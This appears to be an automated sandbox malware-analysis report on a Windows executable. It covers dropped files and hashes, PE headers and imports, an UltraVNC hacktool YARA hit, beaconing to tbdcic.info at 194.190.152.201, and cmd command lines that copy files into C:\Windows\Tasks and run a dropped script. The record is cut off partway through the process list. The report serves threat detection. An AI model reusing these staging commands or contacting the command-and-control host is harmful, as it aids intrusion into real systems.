                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

                                                                    C:\Windows\Tasks\gTFLK1.jBd3Ei

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                    Category:dropped
                                                                    Size (bytes):605114
                                                                    Entropy (8bit):7.931189302613814
                                                                    Encrypted:false
                                                                    SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                    MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                    SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                    SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                    SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                    Malicious:false
                                                                    Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

                                                                    C:\Windows\Tasks\sdABZ4.E1924R

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):867840
                                                                    Entropy (8bit):6.386550733462827
                                                                    Encrypted:false
                                                                    SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                    MD5:0F568F6C821565AB9FF45C7457953789
                                                                    SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                    SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                    SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................

                                                                    C:\Windows\Tasks\sync_browser.exe

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1945368
                                                                    Entropy (8bit):6.532894678367002
                                                                    Encrypted:false
                                                                    SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                    MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                    SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                    SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                    SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.954883444349583
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:Olz7TmvkEW.exe
                                                                    File size:1'641'047 bytes
                                                                    MD5:539b0fc32045de3013d00850827654aa
                                                                    SHA1:eed973e0a66dab8e80a1403acd7beab580c34f94
                                                                    SHA256:cc5d2ffba999e9263c55a6cf0f0d39d3264b8a0f8683bc3c4314d4faf01f2651
                                                                    SHA512:8a8cde6a373509f8d535724dee8838548dfd05ad322141b8b3ccd2a30e9a3a479228e453f222792768b982ccd14c27848518add32a425e7d358041429ab3bb66
                                                                    SSDEEP:24576:WKWs4j30INmn7r9693wUGl1wuXIF1YPQx2zgWzyMZuAZnzF77/voe2D7UGxxy+vY:TFg30I8n7r+FGl+ua1vTWzzlzZoe2DNG
                                                                    TLSH:20752340B6C3C9F5ED53327618F1AD17BBB2ED290B50158F728CFA123930646A52BA77
                                                                    File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................

                                                                    File Icon

                                                                    Icon Hash:357561d6dad24d55

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x41382f
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:1d1577d864d2da06952f7affd8635371

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    push FFFFFFFFh
                                                                    push 00416E98h
                                                                    push 004139C0h
                                                                    mov eax, dword ptr fs:[00000000h]
                                                                    push eax
                                                                    mov dword ptr fs:[00000000h], esp
                                                                    sub esp, 68h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    mov dword ptr [ebp-18h], esp
                                                                    xor ebx, ebx
                                                                    mov dword ptr [ebp-04h], ebx
                                                                    push 00000002h
                                                                    call dword ptr [004151DCh]
                                                                    pop ecx
                                                                    or dword ptr [0041B9E4h], FFFFFFFFh
                                                                    or dword ptr [0041B9E8h], FFFFFFFFh
                                                                    call dword ptr [004151E0h]
                                                                    mov ecx, dword ptr [004199C4h]
                                                                    mov dword ptr [eax], ecx
                                                                    call dword ptr [004151E4h]
                                                                    mov ecx, dword ptr [004199C0h]
                                                                    mov dword ptr [eax], ecx
                                                                    mov eax, dword ptr [004151E8h]
                                                                    mov eax, dword ptr [eax]
                                                                    mov dword ptr [0041B9E0h], eax
                                                                    call 00007F24D8DDB222h
                                                                    cmp dword ptr [00419780h], ebx
                                                                    jne 00007F24D8DDB10Eh
                                                                    push 004139B8h
                                                                    call dword ptr [004151ECh]
                                                                    pop ecx
                                                                    call 00007F24D8DDB1F4h
                                                                    push 00419050h
                                                                    push 0041904Ch
                                                                    call 00007F24D8DDB1DFh
                                                                    mov eax, dword ptr [004199BCh]
                                                                    mov dword ptr [ebp-6Ch], eax
                                                                    lea eax, dword ptr [ebp-6Ch]
                                                                    push eax
                                                                    push dword ptr [004199B8h]
                                                                    lea eax, dword ptr [ebp-64h]
                                                                    push eax
                                                                    lea eax, dword ptr [ebp-70h]
                                                                    push eax
                                                                    lea eax, dword ptr [ebp-60h]
                                                                    push eax
                                                                    call dword ptr [004151F4h]
                                                                    push 00419048h
                                                                    push 00419000h
                                                                    call 00007F24D8DDB1ACh

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x173240xc8.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x309f0.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x150000x364.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x130f00x13200a86014994324ad6f47bddf386fd89176False0.6081495098039216data6.614408281478693IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0x150000x35600x36009abc217bd20b39b1db2f57ddf9bc789cFalse0.4381510416666667data5.5938980842785995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0x190000x29ec0x8004c129856aeef51c872b4a2f6db01e9bdFalse0.44580078125data3.8126171673069433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rsrc0x1c0000x309f00x30a002a495bc4a21e28ce1bddf325b402c213False0.7838658820694088data7.467752676575126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0x1c2800x18dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia0.9696826892868363
                                                                    RT_ICON0x1db600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.08974964572508266
                                                                    RT_ICON0x21d880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.12935684647302906
                                                                    RT_ICON0x243300x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720RussianRussia0.16553254437869822
                                                                    RT_ICON0x25d980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.21106941838649157
                                                                    RT_ICON0x26e400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400RussianRussia0.29508196721311475
                                                                    RT_ICON0x277c80x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680RussianRussia0.33313953488372094
                                                                    RT_ICON0x27e800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.4592198581560284
                                                                    RT_GROUP_ICON0x282e80x76dataRussianRussia0.7457627118644068
                                                                    RT_VERSION0x283600x350data0.4693396226415094
                                                                    RT_MANIFEST0x286b00x33cASCII text, with CRLF line terminatorsEnglishUnited States0.501207729468599

                                                                    Imports

                                                                    DLLImport
                                                                    COMCTL32.dll
                                                                    SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                                                    GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                                    ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                                    USER32.dllGetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
                                                                    ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                                    OLEAUT32.dllSysAllocString, VariantClear, OleLoadPicture
                                                                    KERNEL32.dllSetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
                                                                    MSVCRT.dll??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    RussianRussia
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-12-23T13:39:02.527504+01002035893ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon1192.168.2.749918194.190.152.201443TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 23, 2024 13:37:54.621855021 CET49762443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:37:54.621905088 CET44349762194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:37:54.622064114 CET49762443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:37:54.622330904 CET49762443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:37:54.622343063 CET44349762194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:37:54.622381926 CET44349762194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:37:54.733014107 CET49764443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:37:54.733055115 CET44349764194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:37:54.733122110 CET49764443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:37:54.733278990 CET49764443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:37:54.733293056 CET44349764194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:37:54.733323097 CET44349764194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:38:05.880995989 CET49790443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:38:05.881052017 CET44349790194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:38:05.881278992 CET49790443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:38:05.881357908 CET49790443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:38:05.881366968 CET44349790194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:38:05.881460905 CET44349790194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:38:29.055135012 CET49840443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:38:29.055192947 CET44349840194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:38:29.055327892 CET49840443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:38:29.055552959 CET49840443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:38:29.055557966 CET44349840194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:38:29.055779934 CET44349840194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:39:02.524259090 CET49918443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:39:02.524324894 CET44349918194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:39:02.524431944 CET49918443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:39:02.524542093 CET49918443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:39:02.524557114 CET44349918194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:39:02.524708986 CET44349918194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:39:02.527503967 CET49918443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:39:02.527532101 CET44349918194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:39:47.617419004 CET49994443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:39:47.617491961 CET44349994194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:39:47.617597103 CET49994443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:39:47.617749929 CET49994443192.168.2.7194.190.152.201
                                                                    Dec 23, 2024 13:39:47.617767096 CET44349994194.190.152.201192.168.2.7
                                                                    Dec 23, 2024 13:39:47.617832899 CET44349994194.190.152.201192.168.2.7

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 23, 2024 13:37:48.194267035 CET6033853192.168.2.71.1.1.1
                                                                    Dec 23, 2024 13:37:54.378817081 CET5116553192.168.2.71.1.1.1
                                                                    Dec 23, 2024 13:37:54.516419888 CET53511651.1.1.1192.168.2.7
                                                                    Dec 23, 2024 13:38:11.148245096 CET5120953192.168.2.71.1.1.1
                                                                    Dec 23, 2024 13:38:11.287414074 CET53512091.1.1.1192.168.2.7
                                                                    Dec 23, 2024 13:38:25.547087908 CET5241953192.168.2.71.1.1.1
                                                                    Dec 23, 2024 13:38:25.685323954 CET53524191.1.1.1192.168.2.7

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 23, 2024 13:37:48.194267035 CET192.168.2.71.1.1.10xd1d5Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:37:54.378817081 CET192.168.2.71.1.1.10xde31Standard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:38:11.148245096 CET192.168.2.71.1.1.10xc553Standard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:38:25.547087908 CET192.168.2.71.1.1.10x3805Standard query (0)tbdcic.infoA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 23, 2024 13:37:48.331319094 CET1.1.1.1192.168.2.70xd1d5No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                    Dec 23, 2024 13:37:50.119189024 CET1.1.1.1192.168.2.70xc90eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:37:50.119189024 CET1.1.1.1192.168.2.70xc90eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:37:54.516419888 CET1.1.1.1192.168.2.70xde31No error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:38:11.287414074 CET1.1.1.1192.168.2.70xc553No error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:38:25.685323954 CET1.1.1.1192.168.2.70x3805No error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:38:37.211575031 CET1.1.1.1192.168.2.70xfb84No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:38:37.211575031 CET1.1.1.1192.168.2.70xfb84No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:38:50.084583998 CET1.1.1.1192.168.2.70x658eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:38:50.084583998 CET1.1.1.1192.168.2.70x658eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:39:14.183649063 CET1.1.1.1192.168.2.70x3069No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:39:14.183649063 CET1.1.1.1192.168.2.70x3069No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:39:38.312328100 CET1.1.1.1192.168.2.70x7b85No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Dec 23, 2024 13:39:38.312328100 CET1.1.1.1192.168.2.70x7b85No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:07:37:32
                                                                    Start date:23/12/2024
                                                                    Path:C:\Users\user\Desktop\Olz7TmvkEW.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Olz7TmvkEW.exe"
                                                                    Imagebase:0x400000
                                                                    File size:1'641'047 bytes
                                                                    MD5 hash:539B0FC32045DE3013D00850827654AA
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1299009306.0000000002904000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1299366156.000000000062B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1299009306.0000000002739000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:2
                                                                    Start time:07:37:33
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                                                                    Imagebase:0x410000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:07:37:33
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:07:37:33
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmd
                                                                    Imagebase:0x410000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:07:37:33
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff75da10000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:07:37:34
                                                                    Start date:23/12/2024
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmd
                                                                    Imagebase:0x410000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
